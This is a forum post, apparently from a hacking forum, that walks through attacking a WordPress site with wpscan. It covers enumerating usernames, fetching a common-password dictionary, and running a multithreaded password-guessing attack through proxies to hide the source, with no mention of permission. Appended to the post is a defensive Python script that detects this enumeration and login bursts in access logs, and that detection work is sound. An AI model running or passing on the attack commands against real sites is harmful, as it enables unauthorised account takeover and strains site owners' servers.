WordPress Dictionary Attack


zero

Administrator
Staff member
Boot up your Kali Linux distro and let's get started. Alright - all opened up. We want to run a wpscan on the website we are attacking while also using the "--enumerate u" toggle to find usernames. It might also find some known XSS or other vulns, so pay attention to those too.

  • wpscan --url website.com --enumerate u


  • Our output should look like this - we can see 3 usernames we can try to attack.

  • Before we start our attack, let's get a dictionary to attack it with. Here's a pretty decent one with common WordPress passwords:
    wget https://www.wpwhitesecurity.com/downloads/wpw_pwd_dictionary.zip
    >wget is the command we can use to get that file from a direct download link.
  • Then we need to unzip it:
    unzip wpw_pwd_dictionary.zip
  • We also need to create our username list file, so we can do this:
    nano usernames.txt
  • We type in
    wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt


  • You can add on proxies by using the --proxy toggle, or use http proxies by changing socks5 to http/https or whatever you are after.
    --proxy socks5://127.0.0.1:9000
  • You can also choose how many threads the program will use. More threads will be faster but can cause more issues with the target site - an example added to our command would be:
    wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt --threads 50
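
What this scan looks like from the target's side, as an added example that is not part of the original post: a check over web-server access logs that flags the username enumeration and the threaded password guessing described above. It assumes combined log format and that enumeration shows up as `?author=N` or `/wp-json/wp/v2/users` requests; the log lines are constructed and the thresholds are illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
ENUM_RE = re.compile(r'[?&]author=\d+|/wp-json/wp/v2/users')  # username enumeration probes
LOGIN_RE = re.compile(r'^/(?:wp-login|xmlrpc)\.php')           # password-guessing endpoints

def detect(lines, burst=5, window_s=60, enum_min=3):
    """Return {ip: sorted list of findings} for combined-format access-log lines."""
    logins, enums, findings = defaultdict(list), defaultdict(int), defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        ip, ts, method, path, _status, ua = m.groups()
        if "wpscan" in ua.lower():
            findings[ip].add("scanner-user-agent")  # weak signal: the UA is client-controlled
        if ENUM_RE.search(path):
            enums[ip] += 1
        if method == "POST" and LOGIN_RE.match(path):
            logins[ip].append(datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"))
    for ip, n in enums.items():
        if n >= enum_min:
            findings[ip].add("user-enumeration")
    for ip, times in logins.items():
        times.sort()
        # burst: any `burst` consecutive login POSTs that fit inside window_s seconds
        for i in range(len(times) - burst + 1):
            if (times[i + burst - 1] - times[i]).total_seconds() <= window_s:
                findings[ip].add("login-burst")
                break
    return {ip: sorted(f) for ip, f in findings.items()}

def _line(ip, sec, method, path, status, ua="Mozilla/5.0"):
    # Builds one constructed log line (sample data, not real traffic).
    return (f'{ip} - - [10/Mar/2024:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

SAMPLE = (
    [_line("203.0.113.7", s, "GET", f"/?author={s + 1}", 301, "WPScan v3.8.25") for s in range(3)]
    + [_line("203.0.113.7", 10 + s, "POST", "/wp-login.php", 200) for s in range(8)]
    + [_line("198.51.100.20", 5, "POST", "/wp-login.php", 302),
       _line("198.51.100.20", 6, "GET", "/wp-admin/", 200)]
)

if __name__ == "__main__":
    for ip, found in detect(SAMPLE).items():
        print(ip, found)
```

The same signals are what rate limiting or lockout rules on `wp-login.php` and `xmlrpc.php` would key on; a proxy changes the source address, so per-account failure counts are worth tracking alongside per-IP ones.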
 
